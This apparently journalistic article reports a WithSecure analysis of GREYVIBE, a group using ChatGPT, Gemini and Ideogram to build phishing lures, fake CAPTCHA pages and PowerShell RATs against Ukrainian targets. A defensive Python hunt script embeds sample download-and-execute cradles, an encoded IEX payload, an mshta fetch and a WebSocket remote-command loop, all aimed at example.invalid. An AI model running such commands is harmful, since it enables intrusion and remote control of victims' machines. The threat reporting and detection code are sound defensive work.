GREYVIBE Hackers Use ChatGPT and Google Gemini to Support Cyberattacks on Ukraine
WithSecure has identified a previously untracked threat group called GREYVIBE that has used generative AI tools across cyber operations targeting Ukraine and Ukraine-related entities. The WithSecure GREYVIBE report says the activity has been ongoing since at least August 2025 and includes targets in military, government, civilian, and business-related sectors.
The group has used spear-phishing emails, fake CAPTCHA pages, fraudulent adult-club websites, and fake charity lures to deliver custom malware. WithSecure says the operations align with Russian state interests, particularly intelligence-gathering tied to the war in Ukraine, but the researchers did not make a definitive state attribution.
The most important finding is GREYVIBE’s systematic use of AI tools, including ChatGPT, Google Gemini, and Ideogram AI. Researchers found signs of AI use in phishing content, lure development, image generation, malware development, obfuscators, backend setup, and post-compromise activity.
What GREYVIBE Is
GREYVIBE is a Russia-nexus threat group tracked by WithSecure after researchers linked several campaigns through shared infrastructure, malware, development behavior, and operational patterns. The group has not been definitively tied to a previously tracked actor.
WithSecure says the operators appear to be Russian-speaking and broadly active in the Moscow time zone. The activity also shows signs of overlap with the cybercrime ecosystem, including tooling and infrastructure patterns that do not look like a clean, mature state-only operation.
This mixed profile is important. GREYVIBE appears to sit between cybercrime and state-aligned activity, which makes attribution harder and shows how modern threat groups can combine espionage goals with criminal tooling habits.
| Area | What researchers observed |
|---|---|
| Primary target region | Ukraine and Ukraine-related entities |
| Active since | At least August 2025 |
| Likely operator language | Russian |
| Observed time zone pattern | Moscow time zone activity |
| AI tools referenced | ChatGPT, Google Gemini, Ideogram AI |
| Main malware families | PhantomRelay, FallSpy, LegionRelay |
How GREYVIBE Uses AI in Its Operations
GREYVIBE does not appear to use AI only for isolated tasks. WithSecure says the group shows strong indicators of AI use across several phases of the attack lifecycle.
The group appears to use AI to create lures, build fake websites, generate images, write or refactor malware components, create loaders and obfuscators, and generate post-compromise scripts. This gives a lower-skilled or mid-skilled group the ability to move faster and refresh its tooling more often.
OpenAI has described this broader pattern in its malicious AI use report, noting that threat actors often combine AI models with websites, social platforms, and traditional tooling rather than using AI as a standalone attack system.
Phishing and Fake CAPTCHA Pages Delivered Malware
One GREYVIBE campaign, tracked as PhantomMail, used spear-phishing emails that impersonated Ukrainian organizations and officials. The emails linked to malicious ZIP or RAR archives hosted on third-party file-sharing services, including Google Drive and 4sync.
Those archives launched decoy documents while silently starting the PhantomRelay infection chain. The decoys helped the lure feel credible while the malware executed in the background.
The group also experimented with fake CAPTCHA pages in a campaign tracked as PhantomClick. Victims were told to copy a command and run it themselves as part of a fake verification step (the pattern widely known as ClickFix), and those commands triggered PhantomRelay delivery.
| Campaign | Delivery method | Likely goal |
|---|---|---|
| PhantomMail | Spear-phishing emails with cloud-hosted archives | Deliver PhantomRelay through decoy documents |
| PhantomClick | Fake CAPTCHA pages with command prompts | Trick victims into launching malware |
| PrincessClub | Fake Ukrainian adult-club websites | Deliver FallSpy on Android and RATs on Windows |
| DroneLink | Fake charity sites for military drone support | Deliver malware and post-compromise tools |
Fake Adult-Club Sites Targeted Ukrainian Victims
GREYVIBE’s PrincessClub campaign used fake Ukrainian adult-club websites to target individuals, including Ukrainian combatants. The sites delivered FallSpy on Android and PhantomRelay or LegionRelay on Windows.
The group also used fake personas on Telegram and local dating channels to build trust before directing victims to lure sites or delivering malware. Later versions of the sites included a WebRTC-based live call feature that could capture audio and video after infection.
The WithSecure analysis says this activity was not limited to simple malware delivery. Some lures appeared designed to support surveillance and intelligence collection after the initial compromise.
GREYVIBE’s Malware Toolkit
GREYVIBE relies on a small set of custom malware, loaders, and obfuscators. PhantomRelay is a PowerShell-based remote access trojan that communicates over WebSockets and can run PowerShell scripts or Windows commands sent by the operator.
FallSpy is Android spyware that can collect contacts, call logs, installed applications, phone numbers linked to SIM cards, device details, Wi-Fi SSID, last-known location, public IP address, and media files. Its deployment context suggests surveillance and intelligence-gathering goals.
LegionRelay is a lightweight PowerShell RAT that communicates through REST API methods. WithSecure observed operators using it for file enumeration, file exfiltration, screenshots, browser data theft, messaging data theft, and RDP access setup.
| Tool | Type | Reported capability |
|---|---|---|
| PhantomRelay | Windows PowerShell RAT | Command execution and modular post-compromise scripts |
| FallSpy | Android spyware | Device, location, contacts, media, and call-log theft |
| LegionRelay | PowerShell RAT | File theft, screenshots, browser data theft, and messaging data theft |
| DAYLIGHT | PowerShell obfuscator | Payload obfuscation and malware delivery support |
| TEASOUP | JavaScript obfuscator | Loader and script obfuscation |
AI Helped the Group Move Faster, but Also Created Mistakes
WithSecure assesses that GREYVIBE uses AI to bridge technical gaps, accelerate development, and reduce reliance on old code patterns that might make attribution easier. That gives the group more operational speed than its raw skill level might suggest.
The same reliance on AI also appears to have created weaknesses. WithSecure found design flaws in LegionRelay, which the researchers assess was likely developed with LLM assistance. Those flaws exposed limited backend functionality and gave researchers visibility into attacker activity over time.
This fits a wider trend. The Google Threat Intelligence Group report on AI misuse said APT actors have used Gemini to support multiple phases of the attack lifecycle, including reconnaissance and target development.
GREYVIBE Shows the New Reality of AI-Enabled Threats
GREYVIBE does not show that AI has replaced human operators. Instead, it shows how AI can make existing attack methods faster, cheaper, and more varied.
Threat actors can ask AI systems to draft phishing lures, translate content, improve scripts, refactor code, generate images, and help troubleshoot malware infrastructure. This does not automatically make them elite, but it can raise the floor for what less mature operators can achieve.
OpenAI’s February 2026 threat report makes a similar point: threat activity is rarely limited to one platform, and actors may use different AI models at different points in their workflow.
Attribution Remains Complicated
WithSecure says GREYVIBE activity aligns strongly with Russian state interests, especially intelligence collection related to Ukraine. However, several indicators suggest the group may have ties to the broader cybercrime ecosystem.
Those indicators include tool overlap with cybercrime clusters, test samples uploaded to public platforms, and signs of immature operational security. The group appears persistent and ambitious, but not as polished as top-tier state operators.
That blend creates a difficult attribution problem. A group can serve state-aligned objectives, reuse criminal infrastructure, adopt AI-generated tooling, and still make mistakes that do not fit traditional state actor profiles.
Defensive Takeaways for Security Teams
Organizations supporting Ukraine, working with Ukrainian institutions, or operating in related sectors should treat GREYVIBE-style campaigns as a realistic threat. The group’s lures are tailored, and its use of AI may make future messages and fake sites more convincing.
The Google Threat Intelligence May 2026 report warned that adversaries are moving from early AI experimentation toward more industrial-scale use of generative models in cyber operations. That makes defensive detection harder when attackers can refresh text, code, and infrastructure faster.
- Train users to treat fake CAPTCHA command prompts as malware delivery attempts.
- Block suspicious archive downloads from untrusted cloud-sharing links.
- Hunt for PhantomRelay, FallSpy, LegionRelay, DAYLIGHT, and TEASOUP indicators.
- Review Telegram-based social engineering against high-risk staff.
- Monitor for PowerShell RAT behavior, WebSocket C2, and unusual REST API traffic.
- Inspect Android devices used by high-risk users for spyware indicators.
- Track AI-style lure reuse, generated images, and rapid variation across domains.
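The hunting items above (fake CAPTCHA command prompts, PowerShell RAT behavior, WebSocket C2) can be expressed as a few process-lineage and script-block rules. The following is an added example written for this article, not code from WithSecure's report or from the malware it describes. It runs over constructed Windows telemetry (invented process-creation and PowerShell script-block records, not GREYVIBE indicators): a script interpreter spawned by explorer.exe, which is the parent when a user pastes into the Win+R Run dialog, with a download cradle or encoded command; and a script block that pairs a WebSocket or REST transport with `Invoke-Expression`. The interpreter list, regexes and the `example.invalid` hostnames are assumptions for illustration.

```python
"""Hunt rules over constructed Windows telemetry: Run-dialog launches of
script interpreters with download cradles or encoded commands (the fake
CAPTCHA / ClickFix pattern) and PowerShell script blocks that pair a
WebSocket or REST transport with dynamic code execution (PowerShell RAT style).
Sample events are invented for this example and are not GREYVIBE indicators."""
import base64
import re
from pathlib import PureWindowsPath

# Commands pasted into Win+R run with explorer.exe as the parent process; a
# script interpreter spawned that way with a cradle is rarely a user workflow.
RUN_DIALOG_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download-and-execute cradles and the hidden-window switch seen in pasted one-liners.
CRADLE_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|downloadfile|mshta\s+https?://)|-w(?:indowstyle)?\s+hidden")
# -e / -ec / -en / -enc / -encodedcommand followed by base64 of a UTF-16LE script.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")
# Script block (Event ID 4104) heuristics: a C2 transport plus an execution primitive.
C2_TRANSPORT_RE = re.compile(
    r"(?i)System\.Net\.WebSockets\.ClientWebSocket|\bwss?://|invoke-restmethod")
C2_EXEC_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")

# Constructed encoded payload: PowerShell -EncodedCommand takes base64 of UTF-16LE text.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (irm https://example.invalid/v)".encode("utf-16le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample records (assumed field names), benign and suspicious mixed.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": EXPLORER, "image": PS,
     "cmdline": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/verify)"'},
    {"id": 2, "type": "process", "parent": EXPLORER,
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe report.txt"},
    {"id": 3, "type": "process", "parent": r"C:\Program Files\Git\bin\bash.exe",
     "image": PS, "cmdline": "powershell -NoProfile -File build.ps1"},  # developer shell
    {"id": 4, "type": "scriptblock", "text": (
        "$ws = New-Object System.Net.WebSockets.ClientWebSocket; "
        "$ws.ConnectAsync([Uri]'wss://example.invalid/relay', $ct).Wait(); "
        "while ($true) { $cmd = Receive($ws); Invoke-Expression $cmd }")},
    {"id": 5, "type": "scriptblock",
     "text": r"Get-ChildItem C:\logs -Recurse | Where-Object { $_.Length -gt 1MB }"},
    {"id": 6, "type": "process", "parent": EXPLORER,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/captcha.hta"},
    {"id": 7, "type": "process", "parent": EXPLORER, "image": PS,
     "cmdline": "powershell -enc " + ENCODED_PAYLOAD},
    {"id": 8, "type": "scriptblock",  # REST call without dynamic execution: not flagged
     "text": "$r = Invoke-RestMethod https://example.invalid/api/status; Write-Host $r.ok"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "replace")
    except ValueError:
        return None


def classify(event):
    """Return a short reason if the event matches a hunt rule, else None."""
    if event.get("type") == "process":
        parent = PureWindowsPath(event["parent"]).name.lower()
        image = PureWindowsPath(event["image"]).name.lower()
        if parent in RUN_DIALOG_PARENTS and image in INTERPRETERS:
            if decode_encoded_command(event["cmdline"]) is not None:
                return "encoded command launched from Run dialog"
            if CRADLE_RE.search(event["cmdline"]):
                return "download cradle launched from Run dialog"
        return None
    if event.get("type") == "scriptblock":
        text = event["text"]
        if C2_TRANSPORT_RE.search(text) and C2_EXEC_RE.search(text):
            return "script block pairs WebSocket/REST transport with dynamic execution"
    return None


def triage(events):
    """Return (id, reason) pairs for every event that matches a rule."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason:
            hits.append((event["id"], reason))
    return hits


if __name__ == "__main__":
    for event_id, reason in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {reason}")
```

Event 8 is deliberately not flagged: a REST call on its own is normal administration, so the script-block rule requires both a transport and an execution primitive, which is closer to the operator-driven command execution the RATs described above perform. In production the same rules map directly onto Sysmon Event ID 1 or Security 4688 (process creation with parent) and PowerShell Event ID 4104 (script block logging), which must be enabled for the second rule to have any data.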
Why Traditional Detection Gets Harder
Traditional threat tracking often depends on repeated code patterns, stable infrastructure, reused phishing templates, and familiar malware families. AI-assisted development can reduce those stable signals by helping operators rewrite, refactor, and regenerate components more often.
This does not make attackers invisible. It means defenders need more behavioral detection, stronger identity monitoring, better endpoint visibility, and campaign-level analysis that connects infrastructure, victimology, timing, and operator behavior.
The Google February 2026 AI threat tracker also noted that AI can speed up target research and phishing preparation, which directly affects defenders who rely only on known templates and static indicators.
How Organizations Can Prepare
Security teams should update awareness training to include AI-generated lures, fake verification pages, and dating or charity-themed social engineering. A legitimate CAPTCHA or verification step never requires running a command on the device, so users should never copy and paste commands from a website into Run, PowerShell, Terminal, or a browser console unless they fully trust the source and understand the command.
Incident responders should also preserve telemetry from endpoints, mobile devices, messaging platforms, and DNS logs. GREYVIBE campaigns cross email, web, Telegram, Android, Windows, and cloud-hosted files, so single-channel investigation can miss parts of the attack.
The Google May 2026 AI threat update reinforces the need to monitor how adversaries use AI for operations at scale, while defenders use the same class of tools to triage, correlate, and respond faster.
The Bottom Line
GREYVIBE shows how generative AI is changing cyber operations without replacing traditional tradecraft. The group still uses phishing, fake websites, malware, social engineering, and command-and-control infrastructure, but AI helps it move faster and vary its tools.
The strongest defense is not one signature or one blocklist. Organizations need layered controls that cover user training, endpoint detection, mobile security, cloud file abuse, PowerShell behavior, and threat hunting across multiple channels.
FAQ
GREYVIBE is a threat group tracked by WithSecure. It targets Ukraine and Ukraine-related entities and shows Russia-nexus indicators, including Russian-language artifacts, Moscow time zone activity patterns, and targeting aligned with Russian state interests.
WithSecure found indicators that GREYVIBE used generative AI tools such as ChatGPT, Google Gemini, and Ideogram AI to support lure creation, fake website development, malware components, obfuscators, infrastructure setup, and post-compromise scripts.
WithSecure links GREYVIBE activity to PhantomRelay, FallSpy, and LegionRelay. PhantomRelay and LegionRelay are Windows-focused remote access tools, while FallSpy is Android spyware used for surveillance and data theft.
WithSecure says GREYVIBE activity aligns with Russian state interests and shows Russian-speaking operator indicators, but it has not made a definitive state attribution. The group also shows signs of ties to the broader cybercrime ecosystem.
Defenders should monitor spear-phishing, fake CAPTCHA commands, Telegram-based social engineering, suspicious cloud-hosted archives, PowerShell RAT behavior, Android spyware indicators, and AI-generated lure patterns. High-risk users should receive focused training and stronger endpoint monitoring.